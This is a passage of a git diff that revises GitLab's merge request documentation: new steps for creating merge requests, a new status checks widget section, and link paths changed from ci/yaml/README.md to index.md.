GitLab](../../../gitlab-basics/start-using-git.md#send-changes-to-gitlabcom): -## New merge request by adding, editing, and uploading a file + ```shell + git push origin my-new-branch + ``` -When you choose to edit, add, or upload a file through the GitLab UI, -at the end of the file you see the option to add the **Commit message**, -to select the **Target branch** of that commit, and the checkbox to -**Start new a merge request with these changes**. + GitLab prompts you with a direct link for creating a merge request: -Similarly, if you change files through the Web IDE, when you navigate to **Commit** on the left-hand sidebar, you see these same options. + ```plaintext + ... + remote: To create a merge request for docs-new-merge-request, visit: + remote: https://gitlab.example.com/my-group/my-project/merge_requests/new?merge_request%5Bsource_branch%5D=my-new-branch + ``` -Once you have added, edited, or uploaded the file: +1. Copy the link and paste it in your browser. -1. Describe your changes in the commit message. -1. Select an existing branch to add your commit into, or, if you'd like to create a new branch, type the new branch name (without spaces, capital letters, or special chars). -1. Keep the checkbox checked to start a new merge request straightaway, or, uncheck it to add more changes to that branch before starting the merge request. -1. Click **Commit changes**. +You can add other [flags to commands when pushing through the command line](../push_options.md) +to reduce the need for editing merge requests manually through the UI. -If you chose to start a merge request, you are taken to the -[**New merge request** page](#new-merge-request-page), from -which you can fill it in with information and submit the merge request. +## When you work in a fork -The merge request targets the default branch of the repository. -If you want to change it, you can do it later by editing the merge request. +You can create a merge request from your fork to contribute back to the main project. -## New merge request from a new branch created through the UI - -To quickly start working on files through the GitLab UI, -navigate to your project's **Repository > Branches** and click -**New branch**. A new branch is created and you can start -editing files. - -Once committed and pushed, you can click on the [**Create merge request**](#create-merge-request-button) -button to open the [**New merge request** page](#new-merge-request-page). -A new merge request is started using the current branch as the source, -and the default branch in the current project as the target. - -## New merge request from your local environment - -Assuming you have your repository cloned into your computer and you'd -like to start working on changes to files, start by creating and -checking out a new branch: - -```shell -git checkout -b my-new-branch -``` - -Work on your file changes, stage, and commit them: +1. On the top bar, select **Menu > Project**. +1. Select your fork of the repository. +1. On the left menu, go to **Merge requests**, and select **New merge request**. +1. In the **Source branch** drop-down list box, select the branch in your forked repository as the source branch. +1. In the **Target branch** drop-down list box, select the branch from the upstream repository as the target branch. + You can set a [default target project](#set-the-default-target-project) to + change the default target branch (which can be useful if you are working in a + forked project). +1. Select **Compare branches and continue**. +1. Select **Submit merge request**. -```shell -git add . -git commit -m "My commit message" -``` +After your work is merged, if you don't intend to +make any other contributions to the upstream project, you can unlink your +fork from its upstream project. Go to **Settings > Advanced Settings** and +[remove the forking relationship](../settings/index.md#removing-a-fork-relationship). -Once you're done, [push your branch to GitLab](../../../gitlab-basics/start-using-git.md#send-changes-to-gitlabcom): +For more information, [see the forking workflow documentation](../repository/forking_workflow.md). -```shell -git push origin my-new-branch -``` +## By sending an email **(FREE SELF)** -In the output, GitLab prompts you with a direct link for creating -a merge request: +> The format of the generated email address changed in GitLab 11.7. + The earlier format is still supported so existing aliases + or contacts still work. -```shell -... -remote: To create a merge request for docs-new-merge-request, visit: -remote: https://gitlab-instance.com/my-group/my-project/merge_requests/new?merge_request%5Bsource_branch%5D=my-new-branch -``` +You can create a merge request by sending an email message to GitLab. +The merge request target branch is the project's default branch. -Copy that link and paste it in your browser, and the [**New merge request page**](#new-merge-request-page) -is displayed. +Prerequisites: -There is also a number of [flags you can add to commands when pushing through the command line](../push_options.md) to reduce the need for editing merge requests manually through the UI. +- A GitLab administrator must configure [incoming email](../../../administration/incoming_email.md). +- A GitLab administrator must configure [Reply by email](../../../administration/reply_by_email.md). -If you didn't push your branch to GitLab through the command line -(for example, you used a Git CLI application to push your changes), -you can create a merge request through the GitLab UI by clicking -the [**Create merge request**](#create-merge-request-button) button. +To create a merge request by sending an email: -## New merge request from an issue +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left menu, select **Merge requests**. +1. In the top right, select **Email a new merge request to this project**. + An email address is displayed. Copy this address. + Ensure you keep this address private. +1. Open an email and compose a message with the following information: -You can also [create a new merge request directly from an issue](../repository/web_editor.md#create-a-new-branch-from-an-issue). + - The **To** line is the email address you copied. + - The subject line is the source branch name. + - The message body is the merge request description. -## New merge request from the merge requests page +1. Send the email message. -You can start creating a new merge request by clicking the -**New merge request** button on the **merge requests** page in a project. -Then choose the source project and branch that contain your changes, -and the target project and branch where you want to merge the changes into. -Click on **Compare branches and continue** to go to the -[**New merge request** page](#new-merge-request-page) and fill in the details. +A merge request is created. -## New merge request from a fork +### Add attachments when creating a merge request by email -After forking a project and applying your local changes, complete the following steps to -create a merge request from your fork to contribute back to the main project: +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/22723) in GitLab 11.5. -1. On the top bar, select **Menu > Project**. -1. Select **Your Projects**, then select your fork of the repository. -1. In the left menu, go to **Merge requests**, and click **New merge request**. -1. In the **Source branch** drop-down list box, select your branch in your forked repository as the source branch. -1. In the **Target branch** drop-down list box, select the branch from the upstream repository as the target branch. - You can set a [default target project](#set-the-default-target-project) to - change the default target branch (which can be useful when working with a - forked project). -1. After entering the credentials, click **Compare branches and continue** to compare your local changes to the upstream repository. -1. Assign a user to review your changes, and click **Submit merge request**. +You can add commits to a merge request by adding +patches as attachments to the email. All attachments with a filename +ending in `.patch` are considered patches and are processed +ordered by name. -When the changes are merged, your changes are added to the upstream repository and -the branch as per specification. After your work is merged, if you don't intend to -make any other contributions to the upstream project, you can unlink your -fork from its upstream project in the **Settings > Advanced Settings** section by -[removing the forking relationship](../settings/index.md#removing-a-fork-relationship). +The combined size of the patches can be 2 MB. -For further details, [see the forking workflow documentation](../repository/forking_workflow.md). +If the source branch from the subject does not exist, it is +created from the repository's HEAD or the specified target branch. +You can specify the target branch by using the +[`/target_branch` quick action](../quick_actions.md). If the source +branch already exists, the patches are applied on top of it. ## Set the default target project -Merge requests have a source and a target project which are the same, unless +Merge requests have a source and a target project that are the same, unless forking is involved. Creating a fork of the project can cause either of these scenarios when you create a new merge request: @@ -197,57 +163,11 @@ scenarios when you create a new merge request: option). - You target your own fork. -If you want to have merge requests from a fork by default target your own fork -(instead of the upstream project), you can change the default by: +To have merge requests from a fork by default target your own fork +(instead of the upstream project), you can change the default. -1. In your project, go to **Settings > General > Merge requests**. +1. On the top bar, select **Menu > Project**. +1. On the left menu, select **Settings > General > Merge requests**. 1. In the **Target project** section, select the option you want to use for your default target project. 1. Select **Save changes**. - -## New merge request by email **(FREE SELF)** - -_This feature needs [incoming email](../../../administration/incoming_email.md) -to be configured by a GitLab administrator to be available._ It isn't -available in GitLab.com. - -You can create a new merge request by sending an email to a user-specific email -address. The address can be obtained on the merge requests page by clicking on -a **Email a new merge request to this project** button. The subject is -used as the source branch name for the new merge request and the target branch -is the default branch for the project. The message body (if not empty) -is used as the merge request description. You need -["Reply by email"](../../../administration/reply_by_email.md) enabled to use -this feature. If it's not enabled to your instance, you may ask your GitLab -administrator to do so. - -This is a private email address, generated just for you. **Keep it to yourself** -as anyone who has it can create issues or merge requests as if they were you. -You can add this address to your contact list for easy access. - - - -_In GitLab 11.7, we updated the format of the generated email address. -However the older format is still supported, allowing existing aliases -or contacts to continue working._ - -### Adding patches when creating a merge request via e-mail - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/22723) in GitLab 11.5. - -You can add commits to the merge request being created by adding -patches as attachments to the email. All attachments with a filename -ending in `.patch` are considered patches and they are processed -ordered by name. - -The combined size of the patches can be 2MB. - -If the source branch from the subject does not exist, it is -created from the repository's HEAD or the specified target branch to -apply the patches. The target branch can be specified using the -[`/target_branch` quick action](../quick_actions.md). If the source -branch already exists, the patches are applied on top of it. - -## Reviewing and managing merge requests - -Once you have submitted a merge request, it can be [reviewed and managed](reviews/index.md) through GitLab. diff --git a/doc/user/project/merge_requests/drafts.md b/doc/user/project/merge_requests/drafts.md index 57850ad7304..a91679ffd63 100644 --- a/doc/user/project/merge_requests/drafts.md +++ b/doc/user/project/merge_requests/drafts.md @@ -79,9 +79,9 @@ draft merge requests: ## Pipelines for drafts -When the [pipelines for merged results](../../../ci/merge_request_pipelines/pipelines_for_merged_results/index.md) +When the [pipelines for merged results](../../../ci/pipelines/pipelines_for_merged_results.md) feature is enabled, draft merge requests run -[merge request pipelines](../../../ci/merge_request_pipelines/index.md) only. +[merge request pipelines](../../../ci/pipelines/merge_request_pipelines.md) only. To run pipelines for merged results, you must [mark the merge request as ready](#mark-merge-requests-as-ready). diff --git a/doc/user/project/merge_requests/fail_fast_testing.md b/doc/user/project/merge_requests/fail_fast_testing.md index 68a63aebb90..15ab2d9c8e2 100644 --- a/doc/user/project/merge_requests/fail_fast_testing.md +++ b/doc/user/project/merge_requests/fail_fast_testing.md @@ -19,7 +19,7 @@ that it believes to be relevant to the input files. `tff` is designed for Ruby on Rails projects, so the `Verify/FailFast` template is configured to run when changes to Ruby files are detected. By default, it runs in -the [`.pre` stage](../../../ci/yaml/README.md#pre-and-post) of a GitLab CI/CD pipeline, +the [`.pre` stage](../../../ci/yaml/index.md#pre-and-post) of a GitLab CI/CD pipeline, before all other stages. ## Example use case @@ -42,8 +42,8 @@ This template requires: - A project built in Rails that uses RSpec for testing. - CI/CD configured to: - Use a Docker image with Ruby available. - - Use [Pipelines for merge requests](../../../ci/merge_request_pipelines/index.md#configuring-pipelines-for-merge-requests) -- [Pipelines for Merged Results](../../../ci/merge_request_pipelines/pipelines_for_merged_results/index.md#enable-pipelines-for-merged-results) + - Use [Pipelines for merge requests](../../../ci/pipelines/merge_request_pipelines.md#configure-pipelines-for-merge-requests) +- [Pipelines for Merged Results](../../../ci/pipelines/pipelines_for_merged_results.md#enable-pipelines-for-merged-results) enabled in the project settings. - A Docker image with Ruby available. The template uses `image: ruby:2.6` by default, but you [can override](../../../ci/yaml/includes.md#overriding-external-template-values) this. @@ -62,7 +62,7 @@ rspec-complete: - bundle exec rspec ``` -To run the most relevant specs first instead of the whole suite, [`include`](../../../ci/yaml/README.md#include) +To run the most relevant specs first instead of the whole suite, [`include`](../../../ci/yaml/index.md#include) the template by adding the following to your CI/CD configuration: ```yaml diff --git a/doc/user/project/merge_requests/img/add_previously_merged_commits_button_v14_1.png b/doc/user/project/merge_requests/img/add_previously_merged_commits_button_v14_1.png Binary files differnew file mode 100644 index 00000000000..e60e869f854 --- /dev/null +++ b/doc/user/project/merge_requests/img/add_previously_merged_commits_button_v14_1.png diff --git a/doc/user/project/merge_requests/img/code_quality_mr_diff_report_v14.png b/doc/user/project/merge_requests/img/code_quality_mr_diff_report_v14.png Binary files differindex a942420d65e..da7d4115bd9 100644 --- a/doc/user/project/merge_requests/img/code_quality_mr_diff_report_v14.png +++ b/doc/user/project/merge_requests/img/code_quality_mr_diff_report_v14.png diff --git a/doc/user/project/merge_requests/img/create_from_email.png b/doc/user/project/merge_requests/img/create_from_email.png Binary files differdeleted file mode 100644 index 14eef473e27..00000000000 --- a/doc/user/project/merge_requests/img/create_from_email.png +++ /dev/null diff --git a/doc/user/project/merge_requests/img/create_merge_request_button_v12_6.png b/doc/user/project/merge_requests/img/create_merge_request_button_v12_6.png Binary files differdeleted file mode 100644 index bcbee10e1b7..00000000000 --- a/doc/user/project/merge_requests/img/create_merge_request_button_v12_6.png +++ /dev/null diff --git a/doc/user/project/merge_requests/img/new_merge_request_page_v12_6.png b/doc/user/project/merge_requests/img/new_merge_request_page_v12_6.png Binary files differdeleted file mode 100644 index c0f2ba261cb..00000000000 --- a/doc/user/project/merge_requests/img/new_merge_request_page_v12_6.png +++ /dev/null diff --git a/doc/user/project/merge_requests/img/previously_merged_commits_v14_1.png b/doc/user/project/merge_requests/img/previously_merged_commits_v14_1.png Binary files differnew file mode 100644 index 00000000000..4f49fad10ad --- /dev/null +++ b/doc/user/project/merge_requests/img/previously_merged_commits_v14_1.png diff --git a/doc/user/project/merge_requests/img/status_checks_widget_passed_v14_0.png b/doc/user/project/merge_requests/img/status_checks_widget_passed_v14_0.png Binary files differnew file mode 100644 index 00000000000..de61ca8b553 --- /dev/null +++ b/doc/user/project/merge_requests/img/status_checks_widget_passed_v14_0.png diff --git a/doc/user/project/merge_requests/img/status_checks_widget_pending_v14_0.png b/doc/user/project/merge_requests/img/status_checks_widget_pending_v14_0.png Binary files differnew file mode 100644 index 00000000000..c4e606bd2f4 --- /dev/null +++ b/doc/user/project/merge_requests/img/status_checks_widget_pending_v14_0.png diff --git a/doc/user/project/merge_requests/index.md b/doc/user/project/merge_requests/index.md index b5c51c42ae9..fa90cf524ec 100644 --- a/doc/user/project/merge_requests/index.md +++ b/doc/user/project/merge_requests/index.md @@ -27,13 +27,13 @@ important parts of the merge request:  - **Overview**: Contains the description, notifications from pipelines, and a - discussion area for [comment threads](../../discussions/index.md#resolvable-comments-and-threads) + discussion area for [comment threads](../../discussions/index.md#resolve-a-thread)) and [code suggestions](reviews/suggestions.md). The right sidebar provides fields to add assignees, reviewers, labels, and a milestone to your work, and the [merge request widgets area](widgets.md) reports results from pipelines and tests. - **Commits**: Contains a list of commits added to this merge request. For more information, read [Commits tab in merge requests](commits.md). -- **Pipelines**: If configured, contains a list of recent [GitLab CI/CD](../../../ci/README.md) +- **Pipelines**: If configured, contains a list of recent [GitLab CI/CD](../../../ci/index.md) pipelines and their status. - **Changes**: Contains the diffs of files changed by this merge request. You can [configure the display](changes.md). @@ -119,7 +119,7 @@ For a software developer working in a team: 1. Pushes a commit with their final review. 1. [Approves the merge request](approvals/index.md). 1. Sets it to [merge when pipeline succeeds](merge_when_pipeline_succeeds.md). -1. Your changes get deployed to production with [manual actions](../../../ci/yaml/README.md#whenmanual) for GitLab CI/CD. +1. Your changes get deployed to production with [manual actions](../../../ci/yaml/index.md#whenmanual) for GitLab CI/CD. 1. Your implementations were successfully shipped to your customer. For a web developer writing a webpage for your company's website: diff --git a/doc/user/project/merge_requests/load_performance_testing.md b/doc/user/project/merge_requests/load_performance_testing.md index d1b697add08..7ea785c00ea 100644 --- a/doc/user/project/merge_requests/load_performance_testing.md +++ b/doc/user/project/merge_requests/load_performance_testing.md @@ -10,7 +10,7 @@ type: reference, howto > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/10683) in [GitLab Premium](https://about.gitlab.com/pricing/) 13.2. With Load Performance Testing, you can test the impact of any pending code changes -to your application's backend in [GitLab CI/CD](../../../ci/README.md). +to your application's backend in [GitLab CI/CD](../../../ci/index.md). GitLab uses [k6](https://k6.io/), a free and open source tool, for measuring the system performance of applications under @@ -28,7 +28,7 @@ GET calls to a popular API endpoint in your application to see how it performs. ## How Load Performance Testing works First, define a job in your `.gitlab-ci.yml` file that generates the -[Load Performance report artifact](../../../ci/yaml/README.md#artifactsreportsload_performance). +[Load Performance report artifact](../../../ci/yaml/index.md#artifactsreportsload_performance). GitLab checks this report, compares key load performance metrics between the source and target branches, and then shows the information in a merge request widget: @@ -93,7 +93,7 @@ template that is included with GitLab. NOTE: For large scale k6 tests you need to ensure the GitLab Runner instance performing the actual test is able to handle running the test. Refer to [k6's guidance](https://k6.io/docs/testing-guides/running-large-tests#hardware-considerations) -for spec details. The [default shared GitLab.com runners](../../../ci/runners/README.md#linux-shared-runners) +for spec details. The [default shared GitLab.com runners](../../../ci/runners/build_cloud/linux_build_cloud.md) likely have insufficient specs to handle most large k6 tests. This template runs the @@ -140,7 +140,7 @@ For example, you can override the duration of the test with a CLI option: GitLab only displays the key performance metrics in the MR widget if k6's results are saved via [summary export](https://k6.io/docs/results-visualization/json#summary-export) -as a [Load Performance report artifact](../../../ci/yaml/README.md#artifactsreportsload_performance). +as a [Load Performance report artifact](../../../ci/yaml/index.md#artifactsreportsload_performance). The latest Load Performance artifact available is always used, using the summary values from the test. diff --git a/doc/user/project/merge_requests/merge_request_dependencies.md b/doc/user/project/merge_requests/merge_request_dependencies.md index 21282a55ff2..aace1f58c62 100644 --- a/doc/user/project/merge_requests/merge_request_dependencies.md +++ b/doc/user/project/merge_requests/merge_request_dependencies.md @@ -27,7 +27,7 @@ the other way around. imports the library. - Prevent a documentation-only merge request from being merged before the merge request implementing the feature to be documented. -- Require an merge request updating a permissions matrix to be merged before merging an +- Require a merge request updating a permissions matrix to be merged before merging a merge request from someone who hasn't yet been granted permissions. It is common for a single logical change to span several merge requests, spread diff --git a/doc/user/project/merge_requests/merge_when_pipeline_succeeds.md b/doc/user/project/merge_requests/merge_when_pipeline_succeeds.md index 6c1e33a9ace..d7c9c0f73ee 100644 --- a/doc/user/project/merge_requests/merge_when_pipeline_succeeds.md +++ b/doc/user/project/merge_requests/merge_when_pipeline_succeeds.md @@ -21,7 +21,7 @@ request is updated to show the impending merge. If you can't wait for the pipeline to succeed, you can choose **Merge immediately** in the dropdown menu on the right of the main button. -The author of the merge request and project members with developer permissions can +The author of the merge request and project members with the Developer role can cancel the automatic merge at any time before the pipeline finishes.  @@ -67,8 +67,8 @@ You should be careful to configure CI/CD so that pipelines run for every merge r ### Limitations When this setting is enabled, a merge request is prevented from being merged if there -is no pipeline. This may conflict with some use cases where [`only/except`](../../../ci/yaml/README.md#only--except) -or [`rules`](../../../ci/yaml/README.md#rules) are used and they don't generate any pipelines. +is no pipeline. This may conflict with some use cases where [`only/except`](../../../ci/yaml/index.md#only--except) +or [`rules`](../../../ci/yaml/index.md#rules) are used and they don't generate any pipelines. You should ensure that [there is always a pipeline](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/54226) and that it's successful. @@ -101,7 +101,7 @@ for details on avoiding two pipelines for a single merge request. > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/211482) in GitLab 13.1. -When the **Pipelines must succeed** checkbox is checked, [skipped pipelines](../../../ci/yaml/README.md#skip-pipeline) prevent +When the **Pipelines must succeed** checkbox is checked, [skipped pipelines](../../../ci/yaml/index.md#skip-pipeline) prevent merge requests from being merged. To change this behavior: 1. Navigate to your project's **Settings > General** page. diff --git a/doc/user/project/merge_requests/reviews/index.md b/doc/user/project/merge_requests/reviews/index.md index 317202e9303..16267e13fd5 100644 --- a/doc/user/project/merge_requests/reviews/index.md +++ b/doc/user/project/merge_requests/reviews/index.md @@ -100,7 +100,7 @@ When you submit your review, GitLab: ### Resolving/Unresolving threads -Review comments can also resolve or unresolve [resolvable threads](../../../discussions/index.md#resolvable-comments-and-threads). +Review comments can also resolve or unresolve [resolvable threads](../../../discussions/index.md#resolve-a-thread)). When replying to a comment, a checkbox is displayed to resolve or unresolve the thread after publication. diff --git a/doc/user/project/merge_requests/reviews/suggestions.md b/doc/user/project/merge_requests/reviews/suggestions.md index 9409cc569a6..8ee068531c8 100644 --- a/doc/user/project/merge_requests/reviews/suggestions.md +++ b/doc/user/project/merge_requests/reviews/suggestions.md @@ -14,7 +14,7 @@ type: index, reference As a reviewer, you're able to suggest code changes with a Markdown syntax in merge request diff threads. Then, the merge request author (or other users with appropriate [permission](../../../permissions.md)) is able to apply these suggestions with a click, -which generates a commit in the merge request authored by the user that applied them. +which generates a commit in the merge request authored by the user that suggested the changes. 1. Choose a line of code to be changed, add a new comment, then select the **Insert suggestion** icon in the toolbar: @@ -42,7 +42,7 @@ which generates a commit in the merge request authored by the user that applied After the author applies a suggestion, it's marked with the **Applied** label, the thread is automatically resolved, and GitLab creates a new commit and pushes the suggested change directly into the codebase in the merge request's -branch. [Developer permission](../../../permissions.md) is required to do so. +branch. The [Developer role](../../../permissions.md) is required to do so. ## Multi-line suggestions diff --git a/doc/user/project/merge_requests/status_checks.md b/doc/user/project/merge_requests/status_checks.md index 775820870f3..70e2d718406 100644 --- a/doc/user/project/merge_requests/status_checks.md +++ b/doc/user/project/merge_requests/status_checks.md @@ -8,11 +8,8 @@ disqus_identifier: 'https://docs.gitlab.com/ee/user/project/merge_requests/statu # External Status Checks **(ULTIMATE)** -> - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/3869) in GitLab 14.0. -> - It's [deployed behind a feature flag](../../feature_flags.md), disabled by default. -> - It's disabled on GitLab.com. -> - It's not recommended for production use. -> - To use it in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enable-or-disable-status-checks). **(ULTIMATE SELF)** +> - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/3869) in GitLab 14.0, disabled behind the `:ff_external_status_checks` feature flag. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/320783) in GitLab 14.1. WARNING: This feature might not be available to you. Check the **version history** note above for details. @@ -113,6 +110,31 @@ To complete the deletion of the status check you must select the **Remove status check** button. This **permanently** deletes the status check and it **will not** be recoverable. +## Status checks widget + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/327634) in GitLab 14.1. + +The status checks widget displays in merge requests and shows the status of external +status checks: + + + +An organization might have a policy that does not allow merging merge requests if +external status checks do not pass. However, the details in the widget are for informational +purposes only. GitLab does not prevent merging of merge requests that fail status checks. + +While GitLab waits for a response from the external status check, the widget shows +the status checks as `pending`: + + + +After GitLab [receives a response](../../../api/status_checks.md#set-approval-status-of-an-external-status-check) +from the external status check, the widget updates accordingly. + +NOTE: +GitLab cannot guarantee that the external status checks are properly processed by +the related external service. + ## Troubleshooting ### Duplicate value errors @@ -149,30 +171,18 @@ An unexpected response was received from the branches retrieval API. As suggested, you should close the form and reopen again or refresh the page. This error should be temporary, although if it persists please check the [GitLab status page](https://status.gitlab.com/) to see if there is a wider outage. -## Enable or disable status checks **(ULTIMATE SELF)** - -Status checks are under development and not ready for production use. It is -deployed behind a feature flag that is **disabled by default**. -[GitLab administrators with access to the GitLab Rails console](../../../administration/feature_flags.md) -can enable it. +### Failed to load status checks -To enable it: - -```ruby -# For the instance -Feature.enable(:ff_compliance_approval_gates) -# For a single project -Feature.enable(:ff_compliance_approval_gates, Project.find(<project id>)) +```plaintext +Failed to load status checks ``` -To disable it: +An unexpected response was received from the external status checks API. +You should: -```ruby -# For the instance -Feature.disable(:ff_compliance_approval_gates) -# For a single project -Feature.disable(:ff_compliance_approval_gates, Project.find(<project id>) -``` +- Refresh the page in case this error is temporary. +- Check the [GitLab status page](https://status.gitlab.com/) if the problem persists, + to see if there is a wider outage. ## Related links diff --git a/doc/user/project/merge_requests/test_coverage_visualization.md b/doc/user/project/merge_requests/test_coverage_visualization.md index e044d50d246..ce8bfa2d054 100644 --- a/doc/user/project/merge_requests/test_coverage_visualization.md +++ b/doc/user/project/merge_requests/test_coverage_visualization.md @@ -10,7 +10,7 @@ type: reference, howto > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/3708) in GitLab 12.9. > - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/249811) in GitLab 13.5. -With the help of [GitLab CI/CD](../../../ci/README.md), you can collect the test +With the help of [GitLab CI/CD](../../../ci/index.md), you can collect the test coverage information of your favorite testing or coverage-analysis tool, and visualize this information inside the file diff view of your merge requests (MRs). This will allow you to see which lines are covered by tests, and which lines still require coverage, before the @@ -21,14 +21,14 @@ MR is merged. ## How test coverage visualization works Collecting the coverage information is done via GitLab CI/CD's -[artifacts reports feature](../../../ci/yaml/README.md#artifactsreports). +[artifacts reports feature](../../../ci/yaml/index.md#artifactsreports). You can specify one or more coverage reports to collect, including wildcard paths. GitLab then takes the coverage information in all the files and combines it together. For the coverage analysis to work, you have to provide a properly formatted [Cobertura XML](https://cobertura.github.io/cobertura/) report to -[`artifacts:reports:cobertura`](../../../ci/yaml/README.md#artifactsreportscobertura). +[`artifacts:reports:cobertura`](../../../ci/yaml/index.md#artifactsreportscobertura). This format was originally developed for Java, but most coverage analysis frameworks for other languages have plugins to add support for it, like: @@ -129,7 +129,7 @@ The `source` is ignored if the path does not follow this pattern. The parser ass ### JavaScript example -The following [`gitlab-ci.yml`](../../../ci/yaml/README.md) example uses [Mocha](https://mochajs.org/) +The following [`gitlab-ci.yml`](../../../ci/yaml/index.md) example uses [Mocha](https://mochajs.org/) JavaScript testing and [nyc](https://github.com/istanbuljs/nyc) coverage-tooling to generate the coverage artifact: @@ -147,7 +147,7 @@ test: #### Maven example -The following [`gitlab-ci.yml`](../../../ci/yaml/README.md) example for Java or Kotlin uses [Maven](https://maven.apache.org/) +The following [`gitlab-ci.yml`](../../../ci/yaml/index.md) example for Java or Kotlin uses [Maven](https://maven.apache.org/) to build the project and [JaCoCo](https://www.eclemma.org/jacoco/) coverage-tooling to generate the coverage artifact. You can check the [Docker image configuration and scripts](https://gitlab.com/haynes/jacoco2cobertura) if you want to build your own image. @@ -185,7 +185,7 @@ coverage-jdk11: #### Gradle example -The following [`gitlab-ci.yml`](../../../ci/yaml/README.md) example for Java or Kotlin uses [Gradle](https://gradle.org/) +The following [`gitlab-ci.yml`](../../../ci/yaml/index.md) example for Java or Kotlin uses [Gradle](https://gradle.org/) to build the project and [JaCoCo](https://www.eclemma.org/jacoco/) coverage-tooling to generate the coverage artifact. You can check the [Docker image configuration and scripts](https://gitlab.com/haynes/jacoco2cobertura) if you want to build your own image. @@ -223,7 +223,7 @@ coverage-jdk11: ### Python example -The following [`gitlab-ci.yml`](../../../ci/yaml/README.md) example for Python uses [pytest-cov](https://pytest-cov.readthedocs.io/) to collect test coverage data and [coverage.py](https://coverage.readthedocs.io/) to convert the report to use full relative paths. +The following [`gitlab-ci.yml`](../../../ci/yaml/index.md) example for Python uses [pytest-cov](https://pytest-cov.readthedocs.io/) to collect test coverage data and [coverage.py](https://coverage.readthedocs.io/) to convert the report to use full relative paths. The information isn't displayed without the conversion. This example assumes that the code for your package is in `src/` and your tests are in `tests.py`: @@ -243,7 +243,7 @@ run tests: ### C/C++ example -The following [`gitlab-ci.yml`](../../../ci/yaml/README.md) example for C/C++ with +The following [`gitlab-ci.yml`](../../../ci/yaml/index.md) example for C/C++ with `gcc` or `g++` as the compiler uses [`gcovr`](https://gcovr.com/en/stable/) to generate the coverage output file in Cobertura XML format. diff --git a/doc/user/project/merge_requests/testing_and_reports_in_merge_requests.md b/doc/user/project/merge_requests/testing_and_reports_in_merge_requests.md index 55e122dec76..0a9a2a37bfe 100644 --- a/doc/user/project/merge_requests/testing_and_reports_in_merge_requests.md +++ b/doc/user/project/merge_requests/testing_and_reports_in_merge_requests.md @@ -17,13 +17,13 @@ or link to useful information directly from merge requests: | [Browser Performance Testing](browser_performance_testing.md) **(PREMIUM)** | Quickly determine the browser performance impact of pending code changes. | | [Load Performance Testing](load_performance_testing.md) **(PREMIUM)** | Quickly determine the server performance impact of pending code changes. | | [Code Quality](code_quality.md) | Analyze your source code quality using the [Code Climate](https://codeclimate.com/) analyzer and show the Code Climate report right in the merge request widget area. | -| [Display arbitrary job artifacts](../../../ci/yaml/README.md#artifactsexpose_as) | Configure CI pipelines with the `artifacts:expose_as` parameter to directly link to selected [artifacts](../../../ci/pipelines/job_artifacts.md) in merge requests. | -| [GitLab CI/CD](../../../ci/README.md) | Build, test, and deploy your code in a per-branch basis with built-in CI/CD. | +| [Display arbitrary job artifacts](../../../ci/yaml/index.md#artifactsexpose_as) | Configure CI pipelines with the `artifacts:expose_as` parameter to directly link to selected [artifacts](../../../ci/pipelines/job_artifacts.md) in merge requests. | +| [GitLab CI/CD](../../../ci/index.md) | Build, test, and deploy your code in a per-branch basis with built-in CI/CD. | | [Unit test reports](../../../ci/unit_test_reports.md) | Configure your CI jobs to use Unit test reports, and let GitLab display a report on the merge request so that it's easier and faster to identify the failure without having to check the entire job log. | | [License Compliance](../../compliance/license_compliance/index.md) **(ULTIMATE)** | Manage the licenses of your dependencies. | | [Metrics Reports](../../../ci/metrics_reports.md) **(PREMIUM)** | Display the Metrics Report on the merge request so that it's fast and easy to identify changes to important metrics. | -| [Multi-Project pipelines](../../../ci/multi_project_pipelines.md) **(PREMIUM)** | When you set up GitLab CI/CD across multiple projects, you can visualize the entire pipeline, including all cross-project interdependencies. | -| [Pipelines for merge requests](../../../ci/merge_request_pipelines/index.md) | Customize a specific pipeline structure for merge requests in order to speed the cycle up by running only important jobs. | +| [Multi-Project pipelines](../../../ci/pipelines/multi_project_pipelines.md) **(PREMIUM)** | When you set up GitLab CI/CD across multiple projects, you can visualize the entire pipeline, including all cross-project interdependencies. | +| [Pipelines for merge requests](../../../ci/pipelines/merge_request_pipelines.md) | Customize a specific pipeline structure for merge requests in order to speed the cycle up by running only important jobs. | | [Pipeline Graphs](../../../ci/pipelines/index.md#visualize-pipelines) | View the status of pipelines within the merge request, including the deployment process. | | [Test Coverage visualization](test_coverage_visualization.md) | See test coverage results for merge requests, within the file diff. | diff --git a/doc/user/project/merge_requests/widgets.md b/doc/user/project/merge_requests/widgets.md index 92b2a8f24ef..b0464f3f972 100644 --- a/doc/user/project/merge_requests/widgets.md +++ b/doc/user/project/merge_requests/widgets.md @@ -14,7 +14,7 @@ and the services you configure for your project. ## Pipeline information -If you've set up [GitLab CI/CD](../../../ci/README.md) in your project, +If you've set up [GitLab CI/CD](../../../ci/index.md) in your project, a [merge request](index.md) displays pipeline information in the widgets area of the **Overview** tab: @@ -62,3 +62,9 @@ merge request widget takes you directly to the pages changed, making it easier a faster to preview proposed modifications. [Read more about Review Apps](../../../ci/review_apps/index.md). + +## External status checks **(ULTIMATE)** + +If you have configured [external status checks](status_checks.md) you can +see the status of these checks in merge requests +[in a specific widget](status_checks.md#status-checks-widget). diff --git a/doc/user/project/merge_requests/work_in_progress_merge_requests.md b/doc/user/project/merge_requests/work_in_progress_merge_requests.md deleted file mode 100644 index 8b663b8edf8..00000000000 --- a/doc/user/project/merge_requests/work_in_progress_merge_requests.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'drafts.md' -remove_date: '2021-05-19' ---- - -This document was moved to [another location](drafts.md). - -<!-- This redirect file can be deleted after <2021-05-19>. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/user/project/new_ci_build_permissions_model.md b/doc/user/project/new_ci_build_permissions_model.md deleted file mode 100644 index 55fde63dd47..00000000000 --- 